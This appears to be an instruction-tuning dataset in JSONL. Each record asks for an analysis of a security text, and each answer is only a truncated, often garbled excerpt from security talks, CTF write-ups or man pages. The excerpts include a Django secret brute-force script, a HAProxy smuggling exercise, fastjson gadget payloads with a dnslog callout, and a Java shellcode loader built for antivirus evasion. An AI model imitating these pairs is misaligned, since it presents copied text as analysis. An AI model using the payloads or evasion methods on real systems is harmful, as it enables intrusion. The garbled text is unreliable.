{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDiscovering+and+Triangulating+Rogue+Cell+Towers Eric%Escobar,%PE Security%Engineer What+is+a+rogue+cell+tower?  A+device+created+by+governments+or+hackers+that+has+the+ability+ to+trick+your+phone+into+thinking+its+a+real+cell+phone+tower.  Also+known+as+IMSI+catchers,+interceptors,+cell-site+simulators,+ Stingrays,+and+probably+a+few+more.  Rogue+cell+towers+have+the+ability+to+collect+information+ about+ you+indirectly+through+metadata (call+length,+dialed+numbers)  In+some+conditions+can+collect+content+of+messages,+calls,+and+ data. How+are+cell+simulators+used+today? At+Home+(In+the+United+States):  IMSI-catchers+are+used+by+US+law+enforcement+agencies+to+help+ locate,+track,+and+collect+data+on+suspects.  ACLU+has+identified+66+agencies+and+24+states+that+own+stingrays.  Used+to+monitor+demonstrations+in+the+US+  Used+in+Chicago+political+protests  Its+possible+to+make+an+IMSI-catcher+at+home+  DEFCON+18:+Practical+Cellphone+Spying+ - Chris+Paget How+are+cell+simulators+used+today? Abroad:  Reported+use+in+Ireland,+UK,+China,+Germany,+Norway,+ South+Africa  Chinese+spammers+were+caught+sending+spam+and+ phishing+messages.  Used+by+governments+and+corporations+alike. Whats+the+IMSI+in+IMSI-catcher?  IMSI+stands+for+International+Mobile+Subscriber+Identity.  Is+used+as+a+means+of+identifying+a+device+on+the+cell+network.  Typically+15+digits+long  Contains+general+information+about+you+device+(Country+&+Carrier)  Mobile+Country+Code+ MCC  Mobile+Network+Code+ MNC  Mobile+Subscription+Identification+Number+ MSIN Whats+an+IMSI? IMSI+=+Unique+identifier+to+your+device Sample+IMSI: 3+1+0 2+6 0+1+2+3+4+5+6+7+8+9 MCC MNC MSIN USA AT&T Unique+Identifier Why you should care?  Your+phone+will+connect+automatically+to+cell+site+simulators.  Thieves+can+steal+your+personal+information.  Hackers+can+track+where+you+go,+who+youre+talking+to,+and+grab+all+ sorts+of+other+data+about+you.  Your+digital+life+can+be+sniffed+out+of+the+air+by+anyone+with+some+ technical+chops,+and", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\narp === arp 命令用于显示和修改 IP 到 MAC 转换表 ## 补充说明 **arp 命令** 是 Address Resolution Protocol地址解析协议是通过解析网络层地址来找寻数据链路层地址的一个网络协议包中极其重要的网络传输协议而该命令可以显示和修改 arp 协议解析表中的缓冲数据 这个核心协议模块实现RFC826中定义的 Address Resolution Protocol [译注即TCP/IP的第三层到第一层的地址转换协议]用于在直接相连的网络中换第二层硬件地址和 Ipv4 协议地址之间的转换 用户除非想对其进行配置否则一般不会直接操作这个模块 实际上它提供对核心中其它协议的服务 用户进程可以使用 packet(7) 的 sockets收到 ARP 包译注一译分组 还有一种机制是使用 netlink(7) sockets在用户空间管理 ARP 缓存的机制我们也可以通过 ioctl (2) 控制任意 PF_INET socket上的 ARP 表 ARP 模块维护一个硬件地址到协议地址映射的缓存这个缓存有大小限制所以不常用的和旧的记录Entry将被垃圾收集器清除garbage-collected垃圾收集器永远不能删除标为永久的记录我们可以使用ioctls直接操纵缓冲 并且其性状可以用下面定义的 sysctl 调节 如果在限定的时间见下面的sysctl内一条现存映射没有肯定反馈时 则认为相邻层的缓存记录失效 为了再次向目标发送数据ARP将首先试着询问本地arp进程 app_solicit 次获取更新了的 MAC介质访问控制地址 如果失败并且旧的MAC地址是已知的则发送 ucast_solicit 次的 unicast probe如果仍然失败则将向网络广播一个新的ARP请求,此时要 有待发送数据的队列 如果 Linux 接到一个地址请求而且该地址指向 Linux 转发的地址并且接收接口打开了代理 arp 时Linux 将自动添加一条非永久的代理 arp 记录如果存在拒绝到目标的路由则不添加代理 arp 记录 ### 语法 ```shell arp选项参数 ``` ### 选项 ```shell -a # 主机 显示 arp 缓冲区的所有条目 -H # 地址类型 指定 arp 指令使用的地址类型 -d # 主机 从 arp 缓冲区中删除指定主机的 arp 条目 -D # 使用指定接口的硬件地址 -e # 以 Linux 的显示风格显示 arp 缓冲区中的条目 -i # 接口 指定要操作 arp 缓冲区的网络接口 -s # 主机 MAC 地址 设置指定的主机的 IP 地址与 MAC 地址的静态映射 -n # 以数字方式显示 arp 缓冲区中的条目 -v # 显示详细的 arp 缓冲区条目包括缓冲区条目的统计信息 -f # 文件 设置主机的 IP 地址与 MAC 地址的静态映射 ``` ### 参数 主机查询 arp 缓冲区中指定主机的 arp 条目 ### 实例 显示arp 缓冲区内容 ```shell [root@localhost ~]# arp -v Address HWtype HWaddress Flags Mask Iface 192.168.0.134 ether 00:21:5E:C7:4D:88 C eth1 115.238.144.129 ether 38:22:D6:2F:B2:F1 C eth0 Entries: 2 Skipped: 0 Found: 2 ``` 添加静态 arp 映射 ```shell arp -s IP MAC-ADDRESS arp -s 192.168.1.1 00:b1:b2:b3:b4:b5 ``` 删除 arp 缓存条目 ```shell arp -d 192.168.1.1 ``` <!-- Linux 命令行搜索引擎https://jaywcjlove.github.io/linux-command/ -->", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFrom No Way to 0-day: Weaponizing the Unweaponizable Joshua Wise 1 ...youre de0uing it wrong... Outline  Intro  Vulnerabilities: in general - What makes something easy to exploit?  Vulnerabilities: a case study - Making something hard into something doable  Briefly -- what went wrong? - How did this sort of thing happen?  Q & A 2 Intro: Me  Just some guy, you know?  All-purpose embedded hacker - Got roped into Android at some point  Recovering software guy - Now doing ASIC design  Buzzword compliant - Working on IMB in ECE at CMU 3 unrevoked Intro: You  At least a little bit of kernel experience?  Interested in security?  Not a skript kiddie - No code for you to compile here - Enough description for a skilled programmer to repro this 4 image: me, 12 years old Todays vulnerability  While looking for ways to root Android phones, came across... - CVE-2010-1084  CVE request: kernel: bluetooth: potential bad memory access with sysfs files - ...allows attackers to cause a denial of service (memory corruption)  First showed up in 2.6.18, fixed in 2.6.33 - ...ouch! - Raise your hand if you havent patched up to 2.6.33 yet 5 Mechanism of crash  Classic vulnerability - for each Bluetooth socket, sprintf() onto the end of a string in a buffer - no check for end of buffer  With a twist - gets the buffer from the frame allocator; scribbles into next frame (uncontrolled target) - contents not controlled - length only kind of controlled 6 Yesterdays vulnerability  Refresher: easy vulnerability  Simple stack smash: void cs101_greeter() { // prof said it has 2 be setuid root 4 term axx char buf[1024]; printf(What is your name?\\n); gets(buf); // my prof said not to use gets(3) printf(Hello, %s!\\n, buf);// so i used gets(buf), thats ok rite? }  Easily exploitable properties - Controlled target - Controlled length - Controlled contents (with a few limitations) 7 Watch that stack!  What happens next? - User inputs something bad.  Where does it go? 8 Watch that stack!  What happens next? - U", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nversion: '2' services: mongo: image: mongo:5.0.6 environment: MONGO_INITDB_ROOT_USERNAME: root MONGO_INITDB_ROOT_PASSWORD: root MONGO_INITDB_DATABASE: yapi web: image: vulhub/yapi:1.10.2 ports: - \"3000:3000\" volumes: - ./config.json:/usr/config.json - ./initdb.js:/usr/src/initdb.js environment: - MONGO_ADDR=mongo:27017", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Information Security Experts Copyright  2008 SecureWorks, Inc. All rights reserved. Snort Plug-in Development: Teaching an Old Pig New Tricks Ben Feinstein, CISSP GCFA SecureWorks Counter Threat Unit DEFCON 16 August 8, 2008 The Information Security Experts Copyright  2008 SecureWorks, Inc. All rights reserved.  Snort v2 Architecture & Internals  Snort Plug-in Development  Dynamic Rules  Dynamic Preprocessors  Snort Plug-in API  Examples, Pitfalls, Tips  Releasing several Dynamic Preprocessors  ActiveX Virtual Killbits (DEMO)  DNS Blacklist (DEMO)  Debian OpenSSL \"Weak Keys\" Detection (DEMO) Whats In This Talk? The Information Security Experts Copyright  2008 SecureWorks, Inc. All rights reserved.  Open-source IDS created by Marty Roesch  First released for *NIX platforms 1998  Commercialized by Sourcefire, Inc.  Snort Inline mode now available for IPS  Linux Bridge + Netfilter  Linux ip_queue and nf_queue interfaces  Snort v3 now making its way through Beta  NOT discussing plug-ins for v3  NOT discussing v3 architecture (ask Marty) Snort Basics The Information Security Experts Copyright  2008 SecureWorks, Inc. All rights reserved.  Highly modularized for extensibility  Snort Rules & The Rules Matching Engine  SF Engine Dynamic Plug-in  Detection Plug-ins  implement/extend rules language  Output Plugins  Unified / Unified2  Syslog  Others  Preprocessors  Detection (i.e. alerting)  Normalization (i.e. decoding) Snort v2 Architecture The Basics The Information Security Experts Copyright  2008 SecureWorks, Inc. All rights reserved.  Dynamic Preprocessors  Define a packet processing callback  Preprocessor local storage  Stream-local storage  Dynamic Rules  Writing Snort rules in C  v2.8.0.1(?), added ability to register a C callback  Before, only useful as form of rule obfuscation  Used by some commercial Snort rulesets  Relatively straight forward to RE using IDA Pro Snort v2 Architecture Run-time (Dynamic) Extensions The Information Security Experts Copyright  200", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCrypto for Hackers The Workshop Eijah v1.00 August 7th, 2015 Who am I? 3  Founder  Programmer  Hacker Prerequisites  Laptop  Linux (gcc 4.7), Windows (MSVC 2013)  Crypto++  www.cryptopp.com  Boost 1_58_0  www.boost.org  Workshop Files  www.demonsaw.com  Qmake  www.qt.io  Optional to create your own Makefiles  Jom  www.qt.io  Because windows doesnt support make j 4 4 Lesson 0  Overview  C++ 11  Boost  Crypto++  Demoncrypt  8 Examples with Boost ASIO  Download & configure 5 Lesson 0  Workshop Files  www.demonsaw.com  Download workshop.zip on the downloads page  Create a directory called defcon23  Extract the files into the defcon23 directory 6 Lesson 0  Boost  Download boost 1_58_0  http://sourceforge.net/projects/boost/files/boost/1.58.0/  Extract to the defcon23 directory  Navigate to boost_1_58_0 directory  bootstrap  bjam --layout=system threading=multi runtime-link=static link=static variant=debug architecture=x86 address-model=64 --with-system  Copy boost/libs contents into defcon23/lib directory 7 Lesson 0  Crypto++  Download Crypto++ 5.6.2  http://www.cryptopp.com/#download  Extract to the defcon23/cryptopp directory 8 Lesson 1  Caesars Cipher  https://en.wikipedia.org/wiki/Caesar_cipher  Implement the Caesar's Cipher algorithm  Send a random string to a buddy's machine  Write code that will crack the cipher and display the plaintext data 9 Lesson 2  Hash  https://en.wikipedia.org/wiki/Cryptographic_hash_function  Experiment with different hash algorithms (MD5, SHA1, SHA256, etc.)  Print out a variety of hashes from cmd-line input  Use the security/hex class to better format the output  Send a message and hash digest (of that message) across the network  What are some security concerns with this approach?  Simulate a MITM attack  Add a salt to your hash 10 Lesson 3  HMAC  https://en.wikipedia.org/wiki/Hash-based_message_authentication_code  Experiment with different hmac algorithms  Print out a variety of macs from cmd-line input  Use the security/hex class to", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nYeah Boy! 1 General Flow of talk Play 10-20 second intro from Public Enemys Bring The Noise... If you love rap, youre probably confident with high self esteem and extremely out going. and thats really what this talk is all about.... References: News article: http://www.independent.co.uk/arts-entertainment/music/news/classical-to-rap-music-lovers-have-much-more-in-common-than-you-would-think-919553.html Books: Snoop - Sam Gosling Research paper links (non-exhaustive): Music Preference and the Five-Factor Model of the NEO Personality Inventory http://pom.sagepub.com/content/25/2/120.short Music preference correlates of Jungian types http://www.sciencedirect.com/science/article/pii/S0191886903001685 Weaponizing 2 General Flow of talk My compardres and I, whom Ill introduce as we go along, are going to talk to you about some research we conducted to see to what extent you can determine peoples personality traits through their Facebook activity and what fun things you could do, armed with that knowledge. and because this is DEF CON, how you might EXPLOIT the knowledge of someones personality traits from social networking activity. Well also look at how you might fly under the radar or even subvert the attempts of others to gain an insight into your personality through these means youll see that this is still a pretty untapped area, so our hope is to get some of you suitably inspired to take a look in this area too, before its abused References: chris sumner OnlinePrivacyFoundation.org 3 General Flow of talk Quick introduction Iʼm Chris Sumner, some of you know me by my twitter handle @TheSuggmeister Together with a friend, I co-founded the fledgling volunteer organizations, The Online Privacy Foundation. We deliver talks about security to the non-geeks in our local communities and also conduct research projects to raise awareness. References: http://www.onlineprivacyfoundation.org OnlinePrivacyFoundation - who are we - https://www.onlineprivacyfoundation.org/?page_id=27 htt", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### Heap Spray介绍 **堆喷射**heap spraying指的是一种辅助攻击手法**通过大量分配相同的结构体来达成某种特定的内存布局**从而帮助攻击者完成后续的利用过程常见于如下场景 - 你有一个 UAF但是**你无法通过少量内存分配拿到该结构体**例如该 object 不属于当前 freelist 且释放后会回到 node 上或是像 `add_key()` 那样会被一直卡在第一个临时结构体上这时你可以**通过堆喷射来确保拿到该 object** - 你有一个堆溢出读/写但是**堆布局对你而言是不可知的**比如说开启了 `SLAB_FREELIST_RANDOM`默认开启你可以**预先喷射大量特定结构体从而保证对其中某个结构体的溢出** - ...... 作为一种辅助的攻击手法堆喷射可以被应用在多种场景下", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# hopytal Do you like guessing? Love, even? Oh boy, do I have a challenge for you. > This random secret key generator is used to sign covid certificates issued from the Hopytal laboratory. > > Its behavior seems strange.. the alphabet must be printable. > > Valid 2G+ certificates may be present on the server. > > Dirbusting is not needed to solve the challenge. ### 1. Key generator First, you have to **guess** the algorithm used by the random key generator. After trying and failing multiple times, we guessed correctly: ```python def deterministic_key(seed): CHARSET = string.digits + string.ascii_lowercase + string.ascii_uppercase + string.punctuation random.seed(seed) out = \"\" for i in range(50): out += random.choice(CHARSET) return out ``` There's nothing to suggest this in the description or on the webpage, so it was a long shot. ### 2. Django secret Now, you have to **guess** that the django secret was generated using the same brokem algorithm. But how to check it? You can get a valid session ID by going to `http://hopytal.insomnihack.ch/accounts/login/?next=/login` with invalid sessionid (Why? I don't know, it was discovered by web people). ```python def get_session_id(): r = requests.get(\"http://hopytal.insomnihack.ch/accounts/login/?next=/login\", cookies={\"sessionid\":\"asdasdasdasd\"}) o = r.cookies[\"sessionid\"] return o ``` This will give a session ID like ``` gAUplC4:1nDwUa:bGjgxwu5sOyd8CZWX0jbejGIXjxylHQjQELbXWvoFf4 ``` Of course with this you can also check if you have a valid secret, using django's unsigner: ```python def unsign(payload, key): key = force_bytes(key) salt = 'django.contrib.sessions.backends.signed_cookies' try: TimestampSigner(key=key,salt=salt, algorithm='sha256').unsign(payload, max_age=200000000) return True except BadSignature as e: return False ``` Finally you can combine this and brute-force the secret: ```python SEED = int(time.time()) sid = get_session_id() print(sid) while True: SEED = SEED - 1 if SEED % 1000 == 0: print(datetime.da", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n研究背景  研究内容  总结 Part. 01 研究背景 2 3 探索切攻破切 近年有关网络设备的安全事件 时间 事件 2014-04 思科(cisco)和瞻博(juniper)发现存在heartbleed漏洞 2014-11 卡巴斯基实验室发布报告披露黑暗能量BlackEnergy可 以攻击思科cisco路由器 2015-09 火眼fireeye发布了有关思科cisco路由器SYNful Knock后门的报告 2015-10 安全公司volexity的Steven Adair发现了攻击思科cisco web vpn的案例 2015-12 瞻博(juniper)发现漏洞 万能密码登录设备CVE-2015- 7755可解密VPN流量CVE-2015-7756 2016-01 @esizkur 发现飞塔防火墙Fortigate存在ssh未声明账户 漏洞CVE-2016-5125 2016-08 方程式针对防火墙攻击的工具泄露 4 探索切攻破切 网络设备漏洞特点 ASA 2014.10- 2014.12 2015 2016.1- 2016.6 Dos 9 9 4 Bypass 1 3 1 其他 8 3 1 思科防火墙asa系统漏洞数目 思科ios系统漏洞数目 (CISCO IOS) 2014 2015 2016.1- 2016.5 Dos 32 68 15 Bypass 2 3 0 其他 7 3 2 5 探索切攻破切 研究历史  Attacking Network Embedded System Felix FX Lindner 2002  The Holy Grail Cisco IOS Shellcode And Exploitation Techniques Michael Lynn 2005  Cisco IOS Shellcodes Gyan Chawdhary, Varun Uppal 2007  Cisco IOS - Attack & Defense. The State of the Art Felix FX Lindner 2008  Router Exploitation Felix FX Lindner 2009  Fuzzing and Debugging Cisco IOS SebasEan Muniz, Alfredo Ortega 2011  Killing the Myth of Cisco IOS Diversity Ang Cui, JaEn Kataria, Salvatore J. Stolfo 2011  Breaking Bricks and Plumbing Pipes:Cisco ASA a Super Mario Adventure Alec Stuart- Muirk 2014  Cisco IOS shellcode:all-in-one George Nosenko 2015  Execute my packet David Barksdale,Jordan Gruskovnjak,Alex Wheeler 2016 Part. 02 研究内容 6 7 探索切攻破切 研究步骤 获取 固件 固件 patch 真机 调试 固件 解包 静态 分析 模拟 网络 模拟 系统 模拟 8 探索切攻破切 获取固件  从官网下载  通过网络从设备上拷贝到电脑上  从设备的存储模块读  从网上找网友的分享 8 探索切攻破切 9 探索切攻破切 ASA固件解包 Some loader vmlinuz initrd gzip压缩的rootfs.img Directgbootingg fromgfloppyg isgnoglongergsupported. 10 探索切攻破切 lina  $gcpio -idg<g rootfs.img 10 探索切攻破切 lina 10 探索切攻破切 lina  $gcpiog-idg<g rootfs.img  $glsg/asa/bin/  coredump_helper lina lina_monitor 11 探索切攻破切 ASA系统模拟&调试 12 探索切攻破切 IOS固件解包 12 探索切攻破切 IOS固件解包 13 探索切攻破切 IOS系统模拟&调试 14 探索切攻破切 网络模拟 15 探索切攻破切 真机调试 15 探索切攻破切 真机调试 asa924-k8.bin quiet>loglevel=0>auto>=>>rdinit=/bin/sh 16 探索切攻破切 设备调试命令 16 探索切攻破切 设备调试命令 17 探索切攻破切 CVE-2016-1287  CiscogASAg5500gSeriesgAdaptivegSecuritygApplian", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.TH AT 1 \"Nov 1996\" local \"Linux Programmer's Manual\" .SH NAME at, batch, atq, atrm \\- 排队检查或删除以后要执行的作业 .SH 总览 .B at .RB [-V] .RB [-q .IR 队列] .RB [-f .IR 文件] .RB [-mldbv] .B 时间 .B \"at -c\" .I 作业 .RI [作业...] .B atq .RB [-V] .RB [-q .IR 队列] .RB [-v] .br .B atrm .RB [-V] .I 作业 .RI [作业...] .br .B batch .RB [-V] .RB [-q .IR 队列] .RB [-f .IR 文件] .RB [-mv] .RB [时间] .SH 描述 .B at 和 .B batch 从标准输入或一个指定的文件读取命令这些命令在以后某个时间用 .BR /bin/sh 执行 .TP 8 .BR at 在指定的时间执行命令 .TP 8 .BR atq 列出用户的等待执行的作业在用户是超级用户的情况下列出所有人的作业 .TP 8 .BR atrm 删除作业 .TP 8 .BR batch 在系统负载水平允许的时候执行命令换句话说当平均负 载降到低于0.8或降到了在 atrun 文件中指定的期望值时运行 译注atrun 文件参见 atd 手册页 .PP .B At 允许相当复杂的时间指定它扩展了 POSIX.2 标准它接受 .B HH:MM 的时间式样用来指定在一天的某个时间运行一个作业 (如果时间已经过了则假定为第二天)你可以指定 .B midnight (午夜) .B noon (中午) 或 .B teatime (下午4点)你可以用 .B AM 或 .B PM 后缀指定一天的上午或下午你可以给出 .B month-name day 加上可选 的年份的式样用来指定运行 at 的日期或者给出 .B MMDDYY  .B MM/DD/YY 或 .B DD.MM.YY 式样用来指定运行 at 的日期日期的指定 必须跟在时间指定的后面你也可以给出象 .B now \\+ .I 计数 时间单位 的式样这里的时间单位可以是 .B minutes  .B hours  .B days 或 .B weeks 你可以给时间加一个 .B today 后缀来指定 .B at 今天运行作业可以 给时间加一个 .B tomorrow 后缀来指定 .B at 明天运行作业 .PP 例如要在三天以后的下午 4 点运行一个作业at 时间参数可以 指定为 .B 4pm \\+ 3 days 要在7月31日上午10:00运行一个作业 at 时间参数可以指定为 .B 10am Jul 31 要在明天上午1点运行一个 作业at 时间参数可以指定为 .B 1am tomorrow .PP 时间指定的精确的定义可以在 .IR /usr/share/doc/at/timespec 找到 .PP 对于 .BR at 和 .BR batch 两者从标准输入或以 .B -f 选项指定的文件中 读取命令并执行之工作路径环境变量(除了 .BR TERM .BR DISPLAY 和 .BR _ ) umask 从所期望的时间起保持不变从一个从执行 .B su(1) 命令得到的 shell 中调用的 .B \"at \"\\- 或 .B \"batch \"\\- 命令将保持当前的 userid 用户的命令的标准错误输出和标准输出将用邮件发给用户发送邮件 使用命令 .BR /usr/sbin/sendmail 从一个从执行 .B su(1)命令得到的 shell 中执行了 .B at 登录 shell 的所有者将接到邮件 译注userid 是用户标识的意思umask 是与每个进程相关联的文件 方式创建屏蔽字 .PP 超级用户可以在任何情况下使用这些命令对于其他用户使用 at 的权限由文件 .I /etc/at.allow 和 .I /etc/at.deny 确定 .PP 如果文件 .I /etc/at.allow 存在在其中提及的用户名被允许使用 .BR at 命令 .PP 如果 .I /etc/at.allow 不存在而 .I /etc/at.deny 存在所有在 .I /etc/at.deny 中未提及的用户被允许使用 .BR at 命令 .PP 如果两者均不存在只用超级用户可以使用 .BR at 命令 .PP 一个空的 .I /etc/at.deny 意味着所有用户均被允许使用这些命令 这是缺省的配置 .SH 选项 .TP 8 .B -V 在标准错误上输出版本号 .TP 8 .B -q queue 使用指定的队列一个队列用一个字母", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHOW TO TRAIN YOUR RFID HACKING TOOLS By Craig Young Security Researcher Tripwire VERT HOW TO TRAIN YOUR RFID HACKING TOOLS Table of Contents Introduction ..................................................................................................................................................................... 3 RFID At A Glance ............................................................................................................................................................. 4 What is an RFID Tag ................................................................................................................................................................... 4 Low Frequency Cloning (T55x7) ........................................................................................................................................... 5 High Frequency Cloning ............................................................................................................................................................ 6 Introducing the Proxmark3 (pm3) .......................................................................................................................... 7 Proxmark3s FPGA ...................................................................................................................................................................... 7 Proxmark3s CPU ........................................................................................................................................................................ 8 Proxmark3s ADC ........................................................................................................................................................................ 9 Proxmark3s Connections ........................................................................................................................................................ 9 The NXP PN533 NFC Transceiver Chipset ...............................", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 题目 ## 2018 网鼎杯第一场 clip 通过010 editor 可以看到文件的头部包含有 cloop 字样搜了搜发现这是一个古老的 linux 压缩后的设备题目中又说这个设备损坏了所以就想办法找一个正常的于是搜索如何压缩得到一个 cloop 文件如下 ```shell mkisofs -r test | create_compressed_fs - 65536 > test.cloop ``` 参考https://github.com/KlausKnopper/cloop于是压缩一个文件然后发现源文件文件头存在问题于是进行修复从而考虑如何从 cloop 文件中提取文件即使用 ``` extract_compressed_fs test.cloop now ``` 参考https://manned.org/create_compressed_fs/f2f838da 得到一个 ext4 类型的文件进一步想办法获取这个文件系统的内容 ```shell  clip losetup -d /dev/loop0 losetup: /dev/loop0: detach failed: Permission denied  clip sudo losetup -d /dev/loop0  clip sudo losetup /dev/loop0 now losetup: now: failed to set up loop device: Device or resource busy  clip sudo losetup /dev/loop0 /home/iromise/ctf/2018/0820网鼎杯/misc/clip/now losetup: /home/iromise/ctf/2018/0820网鼎杯/misc/clip/now: failed to set up loop device: Device or resource busy  clip losetup -f /dev/loop10  clip sudo losetup /dev/loop10 /home/iromise/ctf/2018/0820网鼎杯/misc/clip/now  clip sudo mount /dev/loop10 /mnt/now  clip cd /mnt/now  now ls clip-clip.png clip-clop.png clop-clip.png clop-clop.jpg flag.png ``` 最后一步就是修复 flag 了就是少了文件头那几个字符", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacking JSON CONTENTS 目录 1 3 4 JSON 介绍 Gadgets JSON 反序 列化 2 tricks fastjson 在 GitHub 上有着 24.9K+ 的 star 是一个深 受 Java 开发者 欢迎 的开源 JSON 解析 器  它 可以解析 JSON格式 的字符串 支持将 Java Bean转 为JSON字符串 也可以从JSON字符串反序 列化到JavaBean 或是将字符串解析 为 JSON 对象  fastjson 介绍 JSON 要转 为 JavaBean 通 常 必须开启 autotype 而 autotype 默 认情 况下是关闭状 态 所 以不 能 够在 未开启 的情 况下去反序 列化指 定 的类 JSON to Bean JSON = {\"@type\":\"fastjson.SimpleBean\",\"var\":\"foo\"} public class SimpleBean { private String var; public String getVar() { return var; } public void setVar(String var) { this.var = var; } } (SimpleBean) JSON.parse(json); JSON.parseObject(json,SimpleBean.class); JSON.parseObject(json).toJavaObject(SimpleBean.class); SimpleBean bean = new SimpleBean(); bean.setVar(\"foo\"); ParserConfig.getGlobalInstance().setAutoTypeSupport(true); AutoType 默 认关闭 JSON.parse('{\"@type\":\"fastjson.SimpleBean\",\"var\":\"foo\"}') checkAutoType(String typeName,Class expectClass,int features) ObjectDeserializer getDeserializer(Type type) T deserialze(...) class whitelist mappings class use @JSONType enable autotype class extends expectClass enable safeMode class not found class blacklist 非继承自期望类 其他 pass reject JavaBeanDeserializer MiscCodec ThrowableDeserializer MapDeserializer ... JSON 解析 流 程 exit JavaBean 实例化机 制 构造 方法  优先选无参构造  没 有无参构造 会选取 唯一的构造 方法  如 有多个构造 方法 优先选参数 最 多的public构造 方法  如 参数 最 多的构造 方法有多个则随机 选取 一个构造 方法  如 果 被实例化的是静态内部 类 也可以忽视 修饰 符  如 果 被实例化的是非 public类 构造 方法里 的的参数 类型 仍然可以进一步 反序 列化 setter  Field是public时 可以不 用setter方法  其它 需 要public的setter方法 {\"@type\":\"SimpleBean\" ...} public class SimpleBean { private String var1; public SimpleBean(){} public void setVar(String var1) { this.var1 = var1; } } public class SimpleBean { public SimpleBean(String var1, String var2){...} public SimpleBean(String var1, String var2,String var3) {...} } public class SimpleBean { public SimpleBean(String var1,String var2){...} public SimpleBean(String var1,String var2){...} } tricks {{\"@type\":\"java.net.URL\",\"val\":\"http://dnslog.com\"}:\"a\"} {\"@type\":\"java.net.InetSocketAddress\"{\"a", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Door (un)Locked * Category: Web * 100 Points * Solved by the JCTF Team ## Description > Some researchers started deploying a website for their CTF, but something went wrong with the defined policies when trying to hide the flags. > Can you find the weak link? The following file was attached (`ha.cfg`): ``` global daemon defaults mode http timeout client 50000 timeout server 50000 timeout connect 50000 frontend web bind *:8000 http-request deny if { path_beg /flag } http-request deny if { path,url_dec -m reg .*/?flag/?.*$ } default_backend websrvs backend websrvs http-reuse always server srv1 flask:5000 ``` ## Solution The attached website contains nothing interesting: ```console (user@kali)-[/media/sf_CTFs/intent/Door_(un)Locked] $ curl -s http://door-unlocked.chal.intentsummit.org:8000/ | tail -15 <div class=\"w3-display-topleft w3-padding-large w3-xlarge\"> Door (un)Locked </div> <div class=\"w3-display-middle\"> <h1 class=\"w3-jumbo w3-animate-top\">COMING SOON</h1> <hr class=\"w3-border-grey\" style=\"margin:auto;width:40%\"> <p class=\"w3-large w3-center\">1 days left</p> </div> <div class=\"w3-display-bottomleft w3-padding-large\"> Powered by <a href=\"https://www.w3schools.com/w3css/default.asp\" target=\"_blank\">w3.css</a> </div> </div> </body> </html> ``` But if we try to access `/flag`, we can't, due to the `http-request deny` rules: ```console (user@kali)-[/media/sf_CTFs/intent/Door_(un)Locked] $ curl -s http://door-unlocked.chal.intentsummit.org:8000/flag <html><body><h1>403 Forbidden</h1> Request forbidden by administrative rules. </body></html> ``` The syntax of the attached file looks like a HAProxy configuration. Researching known vulnerabilities, we come across [Critical Vulnerability in HAProxy (CVE-2021-40346): Integer Overflow Enables HTTP Smuggling](https://jfrog.com/blog/critical-vulnerability-in-haproxy-cve-2021-40346-integer-overflow-enables-http-smuggling/). The solution is pretty much to follow the blog post and utilize the attack for our case: ``` POST /", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 精简JRE打造依赖的Java-ShellCode-Loader 前 jre录结构 lib录 bin录 精简rt.jar 精简dll 解压捆绑执 EnigmaVirtualBox打包全部件 EnigmaVirtualBox打包jre 最后 @yzddMr6 利众语进免杀直是个屡试不爽的法从python到go再到现在的nim免杀的越 多杀软的检测也就越来越严格现在写的go程序基本只要涉及到络通信360就掉了那么还有没 有什么新的姿势呢 之前介绍过在As-Exploits中到的基于JNA实现的 ShellCodeLoader(https://t.zsxq.com/022FQrFAu)这个Loader在精简后不到1m配合JarLoader模 块在插件可以直接内存加载件不落地后来发现落地了问题也不到现在VT还是0/57所以 前 2 后来抽出来作为个单独的项https://github.com/yzddmr6/Java-Shellcode-Loader 实战有Java的WebShell起来常便键免杀xxx但是缺点是如果来钓或者碰上 jdk环境过过低都不了还是有局限性所以就研究了下怎么跟jre起打包成个单独的可执 件exe 前成果如下解压精简后带jre环境的exe只有6.5mEnigma Virtual Box压缩模式8.5m 跟python打包后差不多VT 6/67基本可以实现我们的需求 原版个jre概快200m在没有安装jre环境的普通户来说显然带着整个jre和后起打包是 不可能的了但我们可以从jre中提取加载后时需要到的class件,并集合到起,这样就能压缩 jre的体积 jre最主要的两个录是bin跟libbin下主要是各类dll跟可执件lib下是java的依赖库精简jre 就可以从这两 access-bridge-64.jar Java Accessibility API是Java Accessibility Utilities的部分它是组实程序类可帮助辅助技术提供对实 现Java Accessibility API的GUI具包的访问 charsets.jar Java 字符集包含 Java 所有持字符的字符集 cldrdata.jar jre录结构 lib录 3 Unicode CLDR为软件提供了持世界语的关键构建块提供了最和最泛的语环境数据库 这些数据被 泛的公司于其软件国际化和本地化使软件适应不同语的惯例以于此类常软件任务. deploy.jar Java安装录的常部分 - 该件运某些产品的安装 